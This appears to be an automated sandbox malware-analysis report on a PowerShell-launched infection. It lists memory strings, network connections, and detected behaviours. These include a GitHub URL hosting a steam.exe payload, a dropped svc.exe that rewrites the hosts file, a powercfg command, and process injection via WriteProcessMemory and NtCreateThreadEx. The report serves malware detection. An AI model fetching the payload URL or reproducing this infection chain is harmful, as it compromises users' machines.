      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1777471442.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000003.2257039433.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2945755544.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
      Source: lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: lsass.exe, 00000018.00000000.1776014623.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2937151320.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
      Source: lsass.exe, 00000018.00000000.1775569736.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2929519617.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
      Source: lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
      Source: powershell.exe, 00000001.00000002.1730889772.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004A7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://objects.githubusercontent.com
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.di
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775766398.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2932233766.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: lsass.exe, 00000018.00000002.2937151320.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1776014623.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1777471442.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000003.2257039433.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2945755544.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
      Source: lsass.exe, 00000018.00000002.2937151320.00000202C024E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1777471442.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000003.2257039433.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1776014623.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2945755544.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
      Source: lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799500674.00000202E2201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775569736.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2929519617.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
      Source: lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: lsass.exe, 00000018.00000002.2947386112.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1777471442.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000003.2257039433.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2947386112.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000000.1778605336.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2945755544.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
      Source: powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/tarzanre/myrepo/releases/download/a/steam.exe
      Source: powershell.exe, 00000001.00000002.1730889772.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
      Source: powershell.exe, 00000001.00000002.1726618411.0000000004A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/672232730/d6a03019-07cf
      Source: svchost.exe, 00000022.00000000.1854193740.000001D5599A5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49732 version: TLS 1.2

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: C:\Users\user\AppData\Local\Temp\svc.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\svc.exeJump to dropped file
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD4110C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,16_2_00007FF6CD4110C0
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey,23_2_00000225DC642A7C
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AE21CC NtQuerySystemInformation,StrCmpNIW,24_2_00000202C0AE21CC
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,24_2_00000202C0AE26F0
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDB2A7C NtEnumerateValueKey,NtEnumerateValueKey,26_2_000002BAAEDB2A7C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C0B5801_2_00C0B580
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C0B5711_2_00C0B571
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD41232816_2_00007FF6CD412328
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD4114E416_2_00007FF6CD4114E4
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD4126E816_2_00007FF6CD4126E8
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD411DB416_2_00007FF6CD411DB4
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC62165823_2_00000225DC621658
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC61B23C23_2_00000225DC61B23C
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC61F2F823_2_00000225DC61F2F8
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC61B03023_2_00000225DC61B030
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC6120DC23_2_00000225DC6120DC
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC65225823_2_00000225DC652258
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC64BE3C23_2_00000225DC64BE3C
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC64FEF823_2_00000225DC64FEF8
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC64BC3023_2_00000225DC64BC30
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC642CDC23_2_00000225DC642CDC
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AC165824_2_00000202C0AC1658
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0ABB23C24_2_00000202C0ABB23C
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0ABF2F824_2_00000202C0ABF2F8
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0ABB03024_2_00000202C0ABB030
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AB20DC24_2_00000202C0AB20DC
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AF225824_2_00000202C0AF2258
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AEBE3C24_2_00000202C0AEBE3C
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AEFEF824_2_00000202C0AEFEF8
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AEBC3024_2_00000202C0AEBC30
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AE2CDC24_2_00000202C0AE2CDC
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6612DF2F825_2_000002A6612DF2F8
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6612E165825_2_000002A6612E1658
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6612DB23C25_2_000002A6612DB23C
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6612DB03025_2_000002A6612DB030
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6612D20DC25_2_000002A6612D20DC
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A66130FEF825_2_000002A66130FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A66131225825_2_000002A661312258
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A66130BE3C25_2_000002A66130BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A66130BC3025_2_000002A66130BC30
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A661302CDC25_2_000002A661302CDC
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAED9165826_2_000002BAAED91658
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAED8B23C26_2_000002BAAED8B23C
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAED8F2F826_2_000002BAAED8F2F8
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAED8B03026_2_000002BAAED8B030
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAED820DC26_2_000002BAAED820DC
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDC225826_2_000002BAAEDC2258
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDBBE3C26_2_000002BAAEDBBE3C
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDBFEF826_2_000002BAAEDBFEF8
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDBBC3026_2_000002BAAEDBBC30
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDB2CDC26_2_000002BAAEDB2CDC
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879920DC27_2_0000026A879920DC
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A8799B03027_2_0000026A8799B030
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A8799F2F827_2_0000026A8799F2F8
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A8799B23C27_2_0000026A8799B23C
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879A165827_2_0000026A879A1658
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879C2CDC27_2_0000026A879C2CDC
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879CBC3027_2_0000026A879CBC30
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879CFEF827_2_0000026A879CFEF8
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879CBE3C27_2_0000026A879CBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879D225827_2_0000026A879D2258
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001795378165828_2_0000017953781658
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001795377B23C28_2_000001795377B23C
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537720DC28_2_00000179537720DC
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001795377B03028_2_000001795377B030
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001795377F2F828_2_000001795377F2F8
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537B225828_2_00000179537B2258
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537ABE3C28_2_00000179537ABE3C
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537A2CDC28_2_00000179537A2CDC
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537ABC3028_2_00000179537ABC30
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537AFEF828_2_00000179537AFEF8
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D54165829_2_000002295D541658
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D53B23C29_2_000002295D53B23C
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D53F2F829_2_000002295D53F2F8
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D53B03029_2_000002295D53B030
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D5320DC29_2_000002295D5320DC
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D57225829_2_000002295D572258
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D56BE3C29_2_000002295D56BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D56FEF829_2_000002295D56FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D56BC3029_2_000002295D56BC30
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D562CDC29_2_000002295D562CDC
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000253067E165830_2_00000253067E1658
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000253067DB23C30_2_00000253067DB23C
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000253067DF2F830_2_00000253067DF2F8
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000253067DB03030_2_00000253067DB030
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000253067D20DC30_2_00000253067D20DC
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E7225830_2_0000025306E72258
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E6BE3C30_2_0000025306E6BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E6FEF830_2_0000025306E6FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E62CDC30_2_0000025306E62CDC
      Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000025306E6BC3030_2_0000025306E6BC30
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3BBC3031_2_000001845B3BBC30
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3B2CDC31_2_000001845B3B2CDC
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3BBE3C31_2_000001845B3BBE3C
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3C225831_2_000001845B3C2258
      Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001845B3BFEF831_2_000001845B3BFEF8
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD42CDC32_2_000001ADECD42CDC
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD4BC3032_2_000001ADECD4BC30
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD4FEF832_2_000001ADECD4FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD5225832_2_000001ADECD52258
      Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001ADECD4BE3C32_2_000001ADECD4BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D5590420DC34_2_000001D5590420DC
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55904B03034_2_000001D55904B030
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55904B23C34_2_000001D55904B23C
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55905165834_2_000001D559051658
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55904F2F834_2_000001D55904F2F8
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D559072CDC34_2_000001D559072CDC
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55907BC3034_2_000001D55907BC30
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55907BE3C34_2_000001D55907BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55908225834_2_000001D559082258
      Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001D55907FEF834_2_000001D55907FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EB225835_2_00000241A9EB2258
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EA2CDC35_2_00000241A9EA2CDC
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EABC3035_2_00000241A9EABC30
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EAFEF835_2_00000241A9EAFEF8
      Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000241A9EABE3C35_2_00000241A9EABE3C
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7316B23C36_2_000001CD7316B23C
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7317165836_2_000001CD73171658
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7316F2F836_2_000001CD7316F2F8
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7316B03036_2_000001CD7316B030
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD731620DC36_2_000001CD731620DC
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7319BE3C36_2_000001CD7319BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD731A225836_2_000001CD731A2258
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7319FEF836_2_000001CD7319FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD7319BC3036_2_000001CD7319BC30
      Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001CD73192CDC36_2_000001CD73192CDC
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E8620DC37_2_000002824E8620DC
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E86B23C37_2_000002824E86B23C
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E86F2F837_2_000002824E86F2F8
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E87165837_2_000002824E871658
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E86B03037_2_000002824E86B030
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E892CDC37_2_000002824E892CDC
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E89BE3C37_2_000002824E89BE3C
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E89FEF837_2_000002824E89FEF8
      Source: C:\Windows\System32\svchost.exeCode function: 37_2_000002824E8A225837_2_000002824E8A2258
